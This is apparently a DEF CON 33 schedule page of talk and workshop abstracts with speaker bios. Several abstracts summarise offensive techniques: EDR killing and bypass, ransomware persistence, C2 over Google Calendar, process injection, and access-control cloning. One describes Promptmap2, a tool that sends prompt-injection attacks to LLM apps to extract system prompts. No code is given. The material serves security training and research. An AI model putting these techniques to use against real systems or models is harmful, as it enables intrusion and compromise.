Threat actors skillfully evade automated defenses. Countering them requires more than tools; it demands human insight and the art of precise detection. In Practical YARA: Crafting Custom Rules for Targeted Malware Defense, you'll move beyond generic signatures and learn the craft of building truly effective YARA rules. This workshop focuses on translating nuanced understanding gained from malware analysis and threat intelligence into powerful, human-authored detections. Through fast-paced, hands-on labs covering static and behavioral analysis, you will master the art of identifying unique malicious characteristics and expressing them effeciently in YARA. Learn to build high-fidelity rules that supercharge threat hunting, pinpoint emerging threats, and give you confident control—skills essential in an era where quality hand-crafted detection logic provides a critical edge. Leave ready to bolster your defensive arsenal with expertise, not just automation.
Speakers:Joshua "jstrosch" Stroschein,Francisco Perdomo,Jae Young KimJoshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.
SpeakerBio: Francisco Perdomo, GoogleFrancisco is a skilled security professional with a strong background in detection engineering and threat intelligence. With extensive blue team experience, he currently works as a Security Engineer at Google's VirusTotal Research team, where he leverages his operational expertise to investigate malware trends and create insightful technical content. Francisco's background includes roles as a SecOps Engineer, and Professor of Computer Security.
SpeakerBio: Jae Young Kim, GoogleJae Young Kim is a Senior Reverse Engineer on Mandiant's FLARE Team where he reverses malware and contributes to FLARE's automated analysis and binary similarity efforts. He is a seasoned instructor and a core contributor to FLARE’s educational content development efforts. He has a Bachelors in Computer Science from Columbia University.
- ics Calendar file
This workshop will focus on our public and private lives, as well as things one might want to keep secret. If all of your data is public, then anyone can access everything everywhere. While access everywhere is the theme of DC 33, we will focus on shutting down access to your data. Being private can help set you free. We will go over both OSINT techniques to see what an individual’s footprint is and then also go over obfuscation techniques to lessen that footprint. Attendees of this workshop should bring their device and be ready to work on becoming more private.
SpeakerBio: Meghan Jacquot
- ics Calendar file
Promptmap2 is a vulnerability scanning tool that automatically tests prompt injection attacks on your custom LLM applications. It analyzes your LLM system prompts, runs them, and sends attack prompts to them. By checking the response, it can determine if the prompt injection was successful or not. It has ready-to-use rules to steal system prompts or distract the LLM application from its main purpose.
SpeakerBio: Utku SenUtku is a security researcher known for creating open-source security tools including promptmap, urlhunter, and wholeaked. He presented his various research and tools many times at DEF CON and Black Hat conferences. He was also nominated for Pwnie Awards in the Best Backdoor category in 2016. He works for Bank of America as a senior security professional.
- ics Calendar file
Many cybercime and APT actors kill and/or silence EDR agents in order to evade detection, allowing them to achieve their actions on objectives without notifying security teams. How do they do it? What tools do they use? How do they write those tools? What is BYOVD? If you’re interested in learning how adversaries bypass EDR platforms, this workshop is for YOU!
Every student who attends this workshop will have a personal lab environment generated for them. Using the online lab environment, students will review a live EDR tool in order to become familiar with its capabilities, logging, and more. Students will then compile and run an EDR killer used commonly by major threat groups. Next, students will execute commands to silence agent-to-tenant communication, thereby negating notification to security teams.
Following the building, use, and analysis of readily-available tools, students will learn how to write their own code to achieve similar means. We will be using a combination of pre-provided code snippets and code we write in real-time in order to both kill and silence the provided EDR agent. Are you ready to take your reverse engineering and coding skills to the next levels? – Let’s do this! And remember: #RansomwareSucks!
Speakers:Ryan "rj_chap" Chapman,Aaron "ironcat" RosenmundRyan Chapman is the author of SANS’ “FOR528: Ransomware and Cyber Extortion” course, teaches SANS’ “FOR610: Reverse Engineering Malware” course, works as a threat hunter @ $dayJob, and is an author for Pluralsight. Ryan has a passion for life-long learning, loves to teach people about ransomware-related attacks, and enjoys pulling apart malware. He has presented workshops at DefCon and other conferences in the past and knows how to create a step-by-step instruction set to maximize hands-on learning.
SpeakerBio: Aaron "ironcat" Rosenmund, Managing Director of Tradecraft and Programs at OnDefendAaron Rosenmund is an accomplished cybersecurity professional with extensive experience in various leadership roles across multiple organizations. Currently serving as the Managing Director of Tradecraft and Programs at OnDefend since September 2024, Aaron also holds a position at the National Guard Bureau as Staff Lead for the Cyber Shield Red Team, demonstrating a commitment to enhancing cybersecurity defenses. With a background that includes significant roles at Pluralsight, where responsibilities spanned content strategy and security skills development, and the Florida Air National Guard as a Lead Cyber Operator focused on defensive operations, Aaron has developed a comprehensive skill set in threat emulation, cyber system operations, and training. Additionally, past leadership positions as CEO at Aestus Industries and Vice President at Concrete Surface Innovations underscore strong management capabilities and operational expertise. Aaron holds multiple degrees in technology and cybersecurity from respected institutions, underscoring a solid educational foundation in this field.
- ics Calendar file
- ics Calendar file
Come meet the largest social network of LGBTQIA+ and allied hackers at Queercon! Our mixers are designed for you to meet, network, and engage with like-minded people to a backdrop of music, dance, and refreshments.
- ics Calendar file
Can You Really Trust Your EDR? Spoiler: Attackers Don’t — They Exploit It.
In the ever-evolving world of cybersecurity, attackers are one step ahead. But what happens when defenders rely on tools that attackers already know how to bypass? In this session, we dive deep into the mindset of adversaries and explore how modern Endpoint Detection and Response (EDR) systems are not the impenetrable fortress many think they are. As a defense researcher specializing in adversarial behavior, I’ve crafted a cross-platform ransomware (Windows, macOS, Linux) to understand the gaps in current defense mechanisms—not to cause harm, but to reveal how attackers think, act, and effortlessly slip past advanced defenses.
Through a live Proof of Concept (PoC) and in-depth technical walkthroughs, we’ll uncover the persistent techniques, evasion strategies, and overlooked system behaviors that let ransomware thrive even in well-defended environments. This talk isn’t meant to alarm—it’s an honest, reality-driven exploration of how attackers exploit EDRs, and more importantly, how defenders can bolster their security strategies.
If you work in blue team operations, threat hunting, or product security, expect to leave with a series of challenging questions rather than comforting answers.
I. Ransomware: Beyond Encryption
Evolving Objectives: Extortion, Persistence, and Disruption When Persistence is the Key to Success, Not the Payload
II. Mastering Persistence Across Platforms
macOS: LaunchAgents as a Stealthy Tool Windows: Registry Hijacking and Scheduled Tasks Linux: Cron Jobs, the Silent Worker
III. Building the Payload: Python and Java in Offensive Security
Quick Deployment: Why high-level languages dominate the attack surface Modular and Adaptable: Flexibility over complexity for real-world attacks
IV. How EDRs Actually Work: A Deep Dive
Detection Techniques: Behavioral analysis, memory scanning The Silent Failures: Weak telemetry collection and blind spots Evasion Patterns: From PoCs to real-world attacks
V. EDR Bypass: Simple Yet Effective Techniques
Signature Evasion: Breaking through with minor tweaks Demonstration: How different commercial EDRs can be bypassed effortlessly
VI. Theory Meets Reality: Lessons Learned from PoCs
Real-World PoCs: Demonstrating how defenses fail against basic, effective tactics Undetected Persistence: How attackers use legitimate tools and strategies to evade detection, even in heavily secured environments The Gap: Why static detection and behavioral analysis don’t always mesh—and how attackers exploit this vulnerability
VII. Final Thoughts: Turning Offensive Knowledge into Defensive Strength
Adopting the Attacker’s Perspective: Understanding offensive techniques to fortify defenses Realism Over Optimism: Building adaptable, resilient security strategies with limited resources A Call to Action: Defend with pragmatism—recognize the attackers’ mindset to create proactive defenses
SpeakerBio: Zoziel FreireI have been working with Information Technology for over 16 years. I worked for a long time as a consultant, providing services to several companies in different segments in Brazil and other countries.
During my career, I acquired vast experience in Incident Response, Forensic Analysis, Threat Hunting, Malware Analysis and Malicious Document Analysis. I worked sharing knowledge as OWASP Chapter Leader - Vitória.
I have some certifications in Information Security. I am passionate about malware development and analysis and forensic investigation.
I have worked with Ransomware Incidents in Brazil and other countries. I am a speaker at events on Hacking and Information Security, Malware Analysis and Information Security Awareness.
- ics Calendar file
This talk revisits Google Calendar RAT (GCR), a proof-of-concept released in 2023 by the speaker, demonstrating how Google Calendar can be abused for stealthy Command&Control (C2) communication. A similar technique was recently observed in the wild, used by the APT41 threat group during a real-world campaign, which highlights the growing interest in abusing trusted cloud services for covert operations.
Building on that concept, the talk introduces a new Golang-based tool that enables SOCKS tunneling over Google services, establishing covert data channels.
The session explores how common cloud platforms can be repurposed to support discreet traffic forwarding and evade traditional network monitoring. While some familiarity with tunneling and cloud services may be helpful, the talk is designed to be accessible and will walk attendees through all key concepts.
Whether you're a penetration tester, red teamer, or simply curious about creative abuse of cloud infrastructure, you’ll leave with fresh ideas and practical insights.
References:
SpeakerBio: Valerio "MrSaighnal" AlessandroniValerio "MrSaighnal" Alessandroni is a seasoned offensive security professional with a lifelong passion for hacking. A former member of the Italian Army’s cyber units, he now leads EY Italy’s Offensive Security team, focusing on advanced red teaming and threat emulation.
He’s behind open-source tools like Google Calendar RAT (GCR) and he holds certifications including OSCP, OSEP, OSWE, OSWP, CRTO, eWPTX, eCPTX and more.
His bug bounty research has earned recognition from Microsoft, NASA, Harvard, and others. Off the keyboard, he rolls on the mat in Brazilian Jiu Jitsu and dreams of space exploration.
- ics Calendar file
Rayhunter is an open source project from EFF to detect IMSI catchers. In this follow up to our main stage talk about the project we will take a deep dive into the internals of Rayhunter. We will talk about the architecture of the project, what we have gained by using Rust, porting to other devices, how to jailbreak new devices, the design of our detection heuristics, open source shenanigans, and how we analyze files sent to us. It's everything you didn't know you wanted to know about Rayhunter.
Speakers:oopsbagel,Cooper "CyberTiger" Quintinoopsbagel is not a bagel but may be eating one while you read this. oops loves contributing to open source software, running wireshark, reversing, hardware hacking, breaking Kubernetes, and floaking.
SpeakerBio: Cooper "CyberTiger" Quintin, Senior Staff Technologist at EFFCooper Quintin is a senior public interest technologist with the EFF Threat Lab. He has given talks about security research at prestigious security conferences including Black Hat, DEFCON, Shmoocon, and ReCon about issues ranging from IMSI Catcher detection to Femtech privacy issues to newly discovered APTs. He has two children and is very tired.
Cooper has many years of security research experience on tools of surveillance used by government agencies.
- ics Calendar file
The Nirvana Debug is a Windows internal features existing since Windows 7. This workshop idea is to see how this feature can be weaponized in order to either: - Hijack execution flow - Perform process injection - Perform sleep obfuscation for C2 beacon
During this workshop, you will learn the main principle of Nirvana Debugging, and try to weaponize it. Some debugging, reverse and coding will be needed in order to create a new malware that will evade classic EDR solutions.
WHILE THIS IS AN INTRODUCTION TO NIRVANA HOOKING, THIS WORKSHOP IS STILL A HIGHLY TECHNICAL WORKSHOP
SpeakerBio: Yoann "OtterHacker" DEQUEKER, RedTeam Leader at WavestoneeYoann Dequeker (@OtterHacker) is a red team operator at Wavestone entitle with OSCP and CRTO certification. Aside from his RedTeam engagements and his contributions to public projects such as Impacket, he spends time working on Malware Developpement to ease beacon deployment and EDR bypass during engagements and is currently developing a fully custom C2.
His research leads him to present his results on several conferences such as LeHack (Paris), Insomni'hack, BlackAlps (Swiss) or even through a 4-hour malware workshop at Defcon31 and Defcon32 (Las Vegas). All along the year, he publishes several white papers on the techniques he discovered or upgraded and the vulnerabilities he found on public products.
- ics Calendar file
Residential solar promises energy independence, but behind the panels lies a chaotic mess of insecure firmware, exposed APIs, and rebadged devices phoning home to mystery servers. This talk exposes how today's solar microgrids can be hijacked through unauthenticated cloud APIs, unsigned firmware updates, hardcoded root credentials, and even vendor-enabled kill switches. No custom exploits. No insider access. Just publicly documented APIs, leaked serial numbers, and a shocking lack of basic security controls.
We will walk through real-world attacks, account takeover via brute-forced PINs, remote access to power dashboards with zero authentication, firmware tampering for persistent implants, and replay attacks against plaintext MODBUS traffic. Our research reveals how vulnerabilities silently propagate across cloned OEMs and shared cloud infrastructure, turning a single bug into an industry-wide risk. If you thought solar made you off-grid, this talk will change your threat model.
References:
Speakers:Anthony "Coin" Rose,Jake "Hubble" KrasnovDr. Anthony "Coin" Rose is the Director of Security Research and Chief Operating Officer at BC Security, as well as a professor at the Air Force Institute of Technology, where he serves as an officer in the United States Air Force. His doctorate in Electrical Engineering focused on building cyber defenses using machine learning and graph theory. Anthony specializes in adversary tactic emulation planning, Red and Blue Team operations, and embedded systems security. Anthony has presented at security conferences, including Black Hat, DEF CON, HackMiami, RSA, HackSpaceCon, Texas Cyber Summit, and HackRedCon. He also leads the development of offensive security tools, including Empire and Moriarty.
SpeakerBio: Jake "Hubble" Krasnov, Red Team Operations Lead and Chief Executive Officer at BC SecurityJake "Hubble" Krasnov is the Red Team Operations Lead and Chief Executive Officer of BC Security, with a distinguished career spanning engineering and cybersecurity. A U.S. Air Force veteran, Jake began his career as an Astronautical Engineer, overseeing rocket modifications, leading test and evaluation efforts for the F-22, and conducting red team operations with the 57th Information Aggressors. He later served as a Senior Manager at Boeing Phantom Works, where he focused on aviation and space defense projects. A seasoned speaker and trainer, Jake has presented at conferences including DEF CON, Black Hat, HackRedCon, HackSpaceCon, and HackMiami.
- ics Calendar file
The new space race is here and as space systems become more interconnected and commercially accessible, their attack surface expands, making them prime targets for cyber threats. Yet, most organizations developing and operating satellites rely on traditional security models, if at all, that do not account for the unique risks of space-based assets. This talk explores the emerging discipline of space red teaming, where offensive security techniques are applied to test and validate the security of satellites, ground stations, and their supporting infrastructure.
In this talk we explore the following:
Understanding the space attack surface: - A breakdown of key vulnerabilities in spacecraft, radio links, and ground control. - Tactics, Techniques, and Procedures (TTPs): How attackers might compromise a space asset, disrupt communications, or manipulate telemetry. - Defensive takeaways: How space operators can leverage red teaming to harden their architectures against real-world threats.
This presentation is ideal for penetration testers, security researchers, space engineers, and policy makers who want to understand the offensive side of space security. Whether you’re an experienced red teamer or just a space junky, this talk will provide practical insights into securing the next frontier.
SpeakerBio: Tim Fowler, ETHSO Labs
- ics Calendar file
In this session we will showcase how you can leverage AI to build your terraform packages for your Red Team Workshop. Make sure to bring your laptops!
SpeakerBio: Moses FrostMoses Frost has been working in the field since the late 90's. Working with computers in the late 80s for fun and moving into a more professional field shortly after high school. He is a Red Team Operator at Neuvik. A senior instructor and course author at the SANS Institute, authoring and teaching the Cloud Penetration Testing Course. He also co-authors the book Gray Hat Hacking: Volume 6. He has worked at many companies, notably Cisco Systems, McAfee, and TLO. Currently, he is a Senior Operator at Neuvik. Over those years, he has enjoyed working in all parts of the IT Industry and hopes to do so for many more years.
- ics Calendar file
Referral Rewards Programs Functionality that most probably view as boring and not worth the time looking at while hunting for bugs on a program. After a deep dive into the implementation of this functionality across dozens of programs, I found them to be hiding some very interesting bugs. My research uncovered various types of business logic flaws, race conditions, and even how the implementations created various client-side gadgets such as cookie-injection and client-side path traversal which could then be used as a part of a client-side chain. This research uncovered vulnerabilities in big name programs such as Instacart, PayPal and Robinhood.
SpeakerBio: Whit "un1tycyb3r" Taylor, Rhino Security LabsAs a penetration tester for Rhino Security Labs, I bring over a decade of experience to the security industry. For the past two years, I have specialized in bug bounty hunting and penetration testing, focusing on web applications and recently expanding into Android application security. My work has resulted in vulnerability submissions to major companies, including Epic Games and PayPal.
Beyond my primary roles, I actively conduct security research on open-source projects and emerging web technologies. This research has led to the discovery of several CVEs, including a critical Unauthenticated Remote Command Execution (RCE) vulnerability in Appsmith Enterprise Edition.
- ics Calendar file
With the maritime industry handling a large portion of global trade, efficient, secure information transfer is essential. Technologies like unmanned aerial vehicles (UAVs), autonomous underwater vehicles (AUVs), and the Internet of Ships (IoS) are enhancing communication and operational efficiency, but they also pose security and network management challenges. Compromised IT systems can lead to easy access to operational technology (OT) networks, increasing the risk of zero-day attacks. This talk presents the current state of maritime comms and explore the feasibility of an SDN-SDR driven cross-layer framework using SATCOM infrastructure for a resilient and reconfigurable maritime comms in dynamic, resource-constrained environments.
SpeakerBio: AviNash Srinivasan, US Naval AcademyDr. Avinash Srinivasan is an Associate Professor in the Cyber Science department at the United States Naval Academy. He holds a Ph.D. and a Master's in Computer Science, and a Bachelor’s in Industrial Engineering. His research interests span the broad areas of cybersecurity and forensics. In particular, his research focuses on network security and forensics, security and forensics in cyber physical systems, and critical infrastructure, steganography and information hiding, cloud computing forensics challenges, and privacy and anonymity. Dr. Srinivasan has administered several grants from agencies including DoD/Navy, NSF, DoJ, DHS, and DoEd. He has published 55 papers in prestigious refereed conferences and journals including IEEE Transactions on Information Forensics and Security, INFOCOM, ICDCS, and ACM SAC. Dr. Srinivasan also holds a patent (Patent number: 11210396). He currently serves on the editorial board for IEEE Transactions on Cognitive Communications and Networking as an Associate Editor. Dr. Srinivasan is a Certified Ethical Hacker (CEH) and Computer Hacking Forensics Investigator (CHFI). He has trained civilians as well as local and state law enforcement personnel in the areas of Macintosh Forensics and Network Forensics.
- ics Calendar file
RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!
SpeakerBio: Cesare "Red5heep" PizziCesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.
- ics Calendar file
RETINA is the very first retro video game built for reverse engineers. Do you want to start the analysis of that sample, but aren’t really in the mood? You can try RETINA for Commodore 64, which can be fully customized with your own sample so that during your game you will also perform the malware triage!
SpeakerBio: Cesare "Red5heep" PizziCesare is a security researcher, analyst, and technology enthusiast. He develops software and hardware and tries to share this with the community. Mainly focused on low-level programming, he developed a lot of open-source software, sometimes hardware related and sometimes not. He does a lot of reverse engineering too. He likes to share his work when possible at conferences like DEF CON, Insomni'hack, and Nullcon. He is a contributor to several open-source security projects including TinyTracer, Volatility, OpenCanary, PersistenceSniper, Speakeasy, and CETUS, and is a CTF player.
- ics Calendar file
Rev.ng is an open source static binary analysis framework and interactive decompiler for native code based on LLVM and QEMU. In our demo we will: [1] Introduce rev.ng and how to use it from the command line. [2] Decompile a simple program to syntactically valid C code that can be fed into other static analysis tools. [3] Showcase our automated whole-program type recovery on a stripped program without debug symbols, able to detect complex types, e.g. linked-lists. [4] Demonstrate the Python scripting capabilities. [5] Demonstrate our preliminary integration with LLMs to assign names to functions, types, and so on. All the examples will be released on GitHub and 100% reproducible using only open source software.
Speakers:Pietro Fezzardi,Alessandro Di FedericoPietro is the CTO of rev.ng Labs, developing the rev.ng decompiler and reverse engineering framework. During his M.Sc. in mathematics, he started working on embedded systems programming. He received his PhD from Politecnico di Milano, working on automated bug-detection for high-level synthesis compilers for FPGA. He spent a short time at ARM in the research security group, working on fuzzing and static program analysis, before joining rev.ng. He is interested in program analysis, compilation, embedded systems programming, C++, free software, OpenStreetMap, juggling, and circus skills.
SpeakerBio: Alessandro Di FedericoAlessandro is the co-founder of rev.ng Labs. He obtained his PhD from Politecnico di Milano with a thesis about rev.ng and has been working on making a product out of it since then. He has been speaking at key industry and academic security conferences such as DEF CON, Recon, the USENIX Security Symposium, and others. He is passionate about compilers, C++, free software, reverse engineering, privacy, OpenStreetMap, hitchhiking, and hiking in the Alps.
- ics Calendar file
We all love security, right? And when we trust a security component to safeguard our most valuable assets such as passwords, key material and biometrics, we want to believe they're doing a good job at it. But what happens when this assumption is flawed, and the chip that was going to protect our assets turns against us?
In this talk we'll present the ReVault attack that targets the [REDACTED] chip embedded in over 100 different laptops models from [VENDOR]. We will demonstrate how a low privilege user can fully compromise the chip, plunder its secrets, gain persistence on its application firmware and even hack Windows back. Are you ready for the heist?
SpeakerBio: Philippe "phLaul" Laulheret, Senior Vulnerability Researcher at Cisco TalosPhilippe Laulheret is a Senior Vulnerability Researcher at Cisco Talos. With a focus on Reverse Engineering and Vulnerability Research, Philippe uses his background in Embedded Security and Software Engineering to poke at complex systems and get them to behave in interesting ways. Philippe presented multiple projects covering hardware hacking, reverse engineering and exploitation at DEF CON, Hardwear.io, Eko Party and more. In his spare time, Philippe enjoys playing CTFs, immersing himself in the beauty of the Pacific Northwest, and exploring the realm of Creative Coding. Philippe holds a MSc in Computer Science from Georgia Tech and a MSc in Electrical and Computer Engineering from Supélec (France).
- ics Calendar file
Practical security is the foundation of any security model. Beyond firewalls and network hardening, government and enterprise alike must consider how security infrastructure safeguards digital, material, and human assets. Physical security is foundational to the ability to resist unauthorized access or malicious threat.
In this training developed by world-renowned access-control expert Babak Javadi, students will be immersed in the mysteries of PACS tokens, RFID credentials, readers, alarm contacts, tamper switches, door controllers, and back-haul protocols that underpin Physical Access Control Systems (PACS) across the globe. The course provides a holistic and detailed view of modern access control and outlines common design limitations that can be exploited. Penetration testers will gain a practical understanding of what PACS looks like in the field, and how to intercept, clone, downgrade, replay, and bypass one's way through the system. Defenders, designers, and directors will come with away with best practices and techniques that will resist attacks.
Participation will include hands-on practical experience with tools, exploits, and refined methods for compromising modern Physical Access Control Systems.
Speakers:Deviant Ollam,Bryan Black,Babak JavadiWhile paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
SpeakerBio: Bryan Black, Red Team AllianceBryan Black is a seasoned physical security professional and esteemed assessment specialist with a comprehensive expertise spanning various facets of site security. His areas of specialization encompass video surveillance, intrusion detection/prevention, access control, network infrastructure, and penetration testing. With an illustrious track record of over a decade, he has collaborated closely with local and state law enforcement, federal and intelligence agencies, as well as prominent private sector corporations. Through these partnerships, he has been instrumental in advising clients and businesses on navigating the constantly evolving threat landscape. He is frequently acknowledged for his discerning critique of prevailing installations and practices within the industry. During his leisure hours, he leverages his engineering background and personal maker space to engage in product development. His endeavors encompass the meticulous design and refinement of innovative tools and procedures aimed at optimizing the efficiency and efficacy of both red and blue team engagement protocols.
SpeakerBio: Babak Javadi, Red Team AllianceBabak Javadi is the President and Founder of The CORE Group, and one of the original co-founding Directors of TOOOL, The Open Organisation of Lockpickers. As a keystone member of the security industry, he is well-recognized expert in professional circles hacker community. Babak's expertise extends to a wide range of security disciplines ranging from high security mechanical cylinders to alarm systems & physical access control systems. Over the past fifteen years Babak has presented and provided trainings a wide range of commercial and government agencies, including Black Hat, The SANS Institute, the USMA at West Point, and more.
- ics Calendar file
Practical security is the foundation of any security model. Beyond firewalls and network hardening, government and enterprise alike must consider how security infrastructure safeguards digital, material, and human assets. Physical security is foundational to the ability to resist unauthorized access or malicious threat.
In this training developed by world-renowned access-control expert Babak Javadi, students will be immersed in the mysteries of PACS tokens, RFID credentials, readers, alarm contacts, tamper switches, door controllers, and back-haul protocols that underpin Physical Access Control Systems (PACS) across the globe. The course provides a holistic and detailed view of modern access control and outlines common design limitations that can be exploited. Penetration testers will gain a practical understanding of what PACS looks like in the field, and how to intercept, clone, downgrade, replay, and bypass one's way through the system. Defenders, designers, and directors will come with away with best practices and techniques that will resist attacks.
Participation will include hands-on practical experience with tools, exploits, and refined methods for compromising modern Physical Access Control Systems.
Speakers:Deviant Ollam,Bryan Black,Babak JavadiWhile paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the the nonprofit's longest-serving Boardmember. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
SpeakerBio: Bryan Black, Red Team AllianceBryan Black is a seasoned physical security professional and esteemed assessment specialist with a comprehensive expertise spanning various facets of site security. His areas of specialization encompass video surveillance, intrusion detection/prevention, access control, network infrastructure, and penetration testing. With an illustrious track record of over a decade, he has collaborated closely with local and state law enforcement, federal and intelligence agencies, as well as prominent private sector corporations. Through these partnerships, he has been instrumental in advising clients and businesses on navigating the constantly evolving threat landscape. He is frequently acknowledged for his discerning critique of prevailing installations and practices within the industry. During his leisure hours, he leverages his engineering background and personal maker space to engage in product development. His endeavors encompass the meticulous design and refinement of innovative tools and procedures aimed at optimizing the efficiency and efficacy of both red and blue team engagement protocols.
SpeakerBio: Babak Javadi, Red Team AllianceBabak Javadi is the President and Founder of The CORE Group, and one of the original co-founding Directors of TOOOL, The Open Organisation of Lockpickers. As a keystone member of the security industry, he is well-recognized expert in professional circles hacker community. Babak's expertise extends to a wide range of security disciplines ranging from high security mechanical cylinders to alarm systems & physical access control systems. Over the past fifteen years Babak has presented and provided trainings a wide range of commercial and government agencies, including Black Hat, The SANS Institute, the USMA at West Point, and more.
- ics Calendar file
When exploring the dark web for OSINT or CTI investigations, you may be overwhelmed with numerous onion links, questionable marketplaces, and numerous search engines. With time constraints, how do you make sense of all this information and prioritize what truly matters? Enter Robin, an AI-powered dark web OSINT tool to streamline your investigations. Robin takes your query, automatically searches across multiple dark web search engines, scrapes relevant onion sites, and uses AI to generate clear, actionable investigative summaries. No more juggling five different tools or wasting hours validating dead links. In this tool demo, I’ll walk you through the real pain points of today’s dark web OSINT tools and show how Robin was built to solve them. I’ll cover the architecture, the scraping and summarization pipeline, and how Robin fits into real-world investigation workflows. I’ll also discuss future developments and how you can get involved. By the end of this talk, you will have a fresh perspective on dark web OSINT, a practical tool to use right away, and insights into how AI can simplify your dark web investigative process.
SpeakerBio: Apurv "ASG_Sc0rpi0n" Singh GautamApurv is a cybercrime researcher working as a senior threat research analyst at Cyble. He is focused on monitoring and analyzing a wide spectrum of sources, creating automated tools, and performing threat investigations by utilizing HUMINT, SOCMINT, and OSINT and producing threat intelligence. He has contributed to the latest SANS Institute's course FOR589 on Cybercrime Intelligence and is a contributing member of Curated Intel. He has delivered talks and workshops at national and international conferences like SANS OSINT Summit, SANS Cyber Defense Forum, DEF CON Blue Team Village, BSides Singapore, RootCon, and others. He is featured in major podcasts like ITSPMagazine and Tech Talks with Singh. He is passionate about giving back to the community and helping others get into this field, and has delivered many talks and workshops in schools and colleges. He loves volunteering with StationX to help students navigate into cybersecurity. In the past, he has also volunteered as a darknet researcher at CTI League and the EBCS darknet analysis group. He holds a master's degree in information security from Georgia Institute of Technology. He looks forward to the end of the day to play and stream one of the AAA games, Rainbow 6 Siege.
- ics Calendar file
Secure Shell (SSH) is finally fun again! After a wild two years, including a near-miss backdoor, clever cryptographic failures, unauthenticated remote code execution in OpenSSH, and piles of state machine bugs and authentication bypass issues, the security of SSH implementations has never been more relevant. This session is an extension of our 2024 work (Unexpected Exposures in the Secure Shell) and includes new research as well as big updates to our open source research and assessment tool, SSHamble.
References:
Most recognized as the creator of Metasploit, HD's professional journey began with exploring telephone networks, developing exploits for the Department of Defense, and hacking into financial institution networks. When he's not working on runZero, he enjoys making weird Go projects, building janky electronics, running in circles, and playing single-player RPGs.
- ics Calendar file
Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
- ics Calendar file
We're kicking off right at 1000! Don't forget to check out our Merch table in the back of the village!
- ics Calendar file
Bug bounty hunting is often portrayed as methodical recon, crafted payloads, and targeted testing. But sometimes, the most interesting vulnerabilities don’t come from planned attacks — they come from the chaos. In this talk, I’ll walk through a handful of real bugs I’ve reported over the years that found me instead.
SpeakerBio: Jasmin "JR0ch17" LandryJasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.
- ics Calendar file
Spotter is a groundbreaking open-source tool designed to secure Kubernetes clusters throughout their lifecycle. Built on the native tooling of Kubernetes by leveraging Common Expression Language for policy definitions, we can define unified security scanning across development, CLI, CI/CD, admission controllers, deployments, runtime, and continuous monitoring. Its unique approach enables both enforcement and monitoring modes, ensuring that policies can be applied consistently and mapped directly to industry standards such as CIS and MITRE ATT&CK. Spotter provides extremely high flexibility across all Kubernetes phases, providing an innovative approach that no other open-source or commercial solution can replicate. It seamlessly bridges security, DevOps, and platform teams, effectively solving the real-world challenges faced by day-to-day operations.
